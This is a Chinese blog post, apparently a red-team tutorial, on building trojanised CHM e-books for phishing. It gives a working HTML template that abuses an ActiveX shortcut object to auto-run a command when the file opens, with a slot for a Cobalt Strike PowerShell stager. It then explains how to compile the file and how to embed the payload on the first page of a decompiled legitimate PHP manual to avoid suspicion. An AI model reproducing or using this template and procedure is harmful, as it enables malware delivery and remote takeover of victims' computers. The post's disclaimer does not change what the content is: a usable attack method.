[红队apt]CHM电子书攻击/电子教程攻击

最新推荐文章于 2024-10-10 22:13:52 发布
最新推荐文章于 2024-10-10 22:13:52 发布
阅读量171 收藏 7
点赞数 3
分类专栏: 渗透测试 # 红队apt 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79590880/article/details/142795961
版权

免责声明:本文用于了解攻击者的攻击手法,切勿用于不法用途

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文主要整理当初电子书的时代,利用电子书攻击的操作

CHM电子书简介

这个在当初普遍用于做教程课件,软件说明等应用。

现在这个用的少了,但是依旧还是有些使用用途。

下面是php的chm教程

这个用来钓鱼还是不错的。

但是一般咱得找点模版,在人家基础上进行编辑。

不然莫名其妙一个奇怪chm太容易被怀疑了。

这个东西其实就是跟网页一样,用h5做的。

制作基础CHM木马

上线模板如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",填入生成的PS上线命令">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

CS生成web投递指令

填好内容

点运行

复制下面的指令

然后去掉这个命令中的双引号,并且在exe后面加个,

之后复制到模板的指定位置

然后用easy chm去制作chm电子书

创建一个项目,把这个html文件添加进去

完成之后点编译

生成木马,chm文件在对应目录的上一个目录

但是这样打开一个啥也没有的chm确实很可疑。

所以我们往往会选择一个正统的chm文本做嵌入。

高级版CHM木马

找一个真正有用的chm文件

这次我们使用这个php文档作为嵌入

这个是成品,我们需要先给他反编译过来。

反编译掉他

插入攻击代码,保存一下。

然后打开即可。

尽量在首页插入,不然他不浏览可能不会中招。

当然从社工角度也可以往后面插,因为一打开提示安全问题也比较怀疑。

北岭敲键盘的荒漠猫
关注
专栏目录
约束委派攻击原理与利用
内心不种满鲜花就会长满杂草
04-11 7314
约束委派攻击主要利用了Windows域环境中的Kerberos协议及其扩展S4U(Service for User to Self和Service for User to Proxy)机制。约束委派是微软在Windows Server 2003中引入的一种安全机制,旨在限制服务账户在模拟用户时仅能访问特定的服务,而非所有服务。这一机制通过Kerberos协议的S4U2Self和S4U2Proxy两个子协议实现。
红队攻击地址反查,发现灯塔系统
qq_41819939的博客
06-15 1803
最近玩了一周红蓝对抗,作为防守方每天不停地看日志、封ip;封到整个人头皮发麻,封到看不见攻击日志,封到攻击队开始懈怠。
红队APT--小结
金灰的博客
07-02 810
免责声明;内容仅做分享...
小迪安全-免杀对抗+红队APT
m0_73767545的博客
06-03 426
就是利用字眼,对官网域名进行修改,在.com后加上其他字符,例如.com.cn。判断邮箱是否有spf验证(对IP进行校验,满足即可发送),如果无即可伪造。nslookup -type=txt 邮箱域名后缀。
网络安全红队常用的攻击方法及路径
热门推荐
kali_Ma的博客
10-23 1万+
通常进入内网后,同样会进行内网信息收集、域内信息收集,在通过收集的信息进行内网漫游横向渗透扩大战果,在内网漫游过程中,会重点关注邮件服务器权限、OA系统权限、版本控制服务器权限、集中运维管理平台权限、统一认证系统权限、域控权限等位置,尝试突破核心系统权限、控制核心业务、获取核心数据,最终完成目标突破工作。在这个过程中,红队成员往往会使用最少流量动作去尝试突破边界防御,找到与内网连接的通道,这种由外到内的过程一般称之为纵向渗透,当初步获得权限后,若权限不够会进行提权,在进行稳固权限、建立隧道;
红队常用攻击套路
weixin_43977912的博客
05-06 3228
红队的实战过程中,红队专家们逐渐摸出了一些套路、总结了一些经验:有后台或登录入口的,会尽量尝试通过弱口令等方式进入系统;找不到系统漏洞时,会尝试社工钓鱼,从人开展突破;有安全防护设备的,会尽量少用或不用扫描器,使用EXP力求一击即中;针对防守严密的系统,会尝试从子公司或供应链来开展工作;建立据点过程中,会用多种手段多点潜伏,防患于未然。 下面介绍九种红队最常用的攻击战术。 一、 利用弱口令获得权限 弱密码、默认密码、通用密码和已泄露密码通常是红队专家们关注的重点。实际工作中,通过弱口令获得权限的情况占据9
【Red Team——基础】红队的 PostgreSQL 攻击教程
Fly_鹏程万里
03-07 1189
PostgreSQL是一个流行的开源关系数据库,具有广泛的平台支持。您可以在各种POSIX操作系统以及Windows上找到它。根据系统的配置,Postgres可以成为红队利用的宝贵资源。了解基础知识非常重要。那么让我们开始攻击PostgreSQL吧! 服务发现 Nmap是一个适合服务发现的扫描程序。我们可以很容易地选择massscan或unicornscan,但最简单的nmap命令通常是发...
红队攻击手法一
weixin_43977912的博客
05-10 1247
一、 正面突破——跨网段控制工控设备 某企业为国内某大型制造业企业,内部生产网大量使用双网卡技术实现网络隔离。在本次实战攻防演习活动中,攻击队的目标是:获取该企业工控设备控制权限。 经过前期的情报收集与分析,攻击队制定了首先突破办公网,再通过办公网渗透进入工控网的战略部署。 1) 突破办公网 攻击队首先选择该企业的门户网站作为突破口,并利用一个0Day漏洞获取了该门户网站应用与操作系统的管理员权限,从而获取到该企业办公内网的接入权限。 在横向移动过程中,攻击队又探测到该企业内网中的多个服务系统和多台服务器。
APT攻击检测可用的数据集大全
weixin_44652589的博客
11-14 3327
可用于APT检测的公开数据集集合
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
「工控安全红队技术漫谈 - APT攻击.zip
11-09
《工控安全红队技术漫谈 - APT攻击 工控安全,即工业控制系统安全,是当前网络安全领域中的一个重要分支。随着信息化与工业化深度融合,工控系统的安全问题日益凸显,尤其是高级持续性威胁(Advanced Persistent ...
APT 攻击指南基本思路+网络攻击与防御图谱+渗透学思维到构图.rar
01-16
Red Teaming是一种模拟对抗性测试,其中“红队”代表攻击者,模拟真实的APT攻击,以测试组织的安全防护能力。通过这种方式,组织可以发现并改进其防御策略。 6. **深度分析**: 在面对APT攻击时,深度分析是关键...
EHole(棱洞)-红队重点攻击系统指纹探测工具魔改版
03-29
EHole是一款对资产中重点系统指纹识别...EHole旨在帮助红队人员在信息收集期间能够快速从C段、大量杂乱的资产中精准定位到易被攻击的系统,从而实施进一步攻击。 原作者地址: https://github.com/ShiHuang-ESec/EHole ...
IEC104规约的秘密之九----链路层和应用层
XZHOUMIN的博客
10-10 184
这个和OSI7层模型是类似的,每层只管和对方通信,下层就将上一层的报文增加一个信封,即报文头和报文尾,104这里只加了报文头的6个字节。当然,某些报文看起来是一问一答,比如U帧测试帧,但中间是可以随时插入其他帧的。链路层进行通讯和应用层通讯是异步的,就是应用层没有报文时,链路层会进行通讯维护链路层。应用有报文时,交给链路层,链路层放在发送队列,按优先级进行发送。我们看到报文都是68打头的,因为应用层报文也要交给链路层发送,链路层增加了开头的6个字节再进行发送。应用层报文就是I帧,其中包含链路层控制信息。
[Linux#63][TCP] 常见标志位 | 为什么是三次握手,四次挥手?
最新发布
2301_80171004的博客
10-10 500
本文介绍了 TCP 协议中 6 个标志位的作用、三次握手和四次挥手的具体过程,以及 TIME_WAIT 状态的处理方法
Macbook ToDesk 无法连接网络
Primer5
10-04 322
检查登录项,看到后台运行项目是关闭状态,允许后台运行之后返回查看立马显示网络连接正常。网络连接的是 Wi-Fi,打开浏览器能跟正常浏览内容,说明 Wi-Fi 是正常的。检查防火墙是没有阻止ToDesk 的任何连接,说明防火墙也是正常的。
网络风暴产生原因、危害、预防和解决方法
luotuo28的博客
10-09 239
网络风暴是指由于某种原因引发的网络中数据流量急剧增加,导致网络性能严重下降甚至瘫痪的现象。
socket编程(java)
qq_68883928的博客
10-10 238
​ Socket(套接字)是计算机网络编程中用于实现网络通信的一种机制。它提供了一种编程接口,允许应用程序通过网络进行数据传输,实现不同主机之间的通信。​ Socket可以看作是一种抽象的概念,用于描述网络通信的端点。它包含了通信所需的各种参数和状态信息,以便应用程序能够通过它进行数据的发送和接收。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北岭敲键盘的荒漠猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值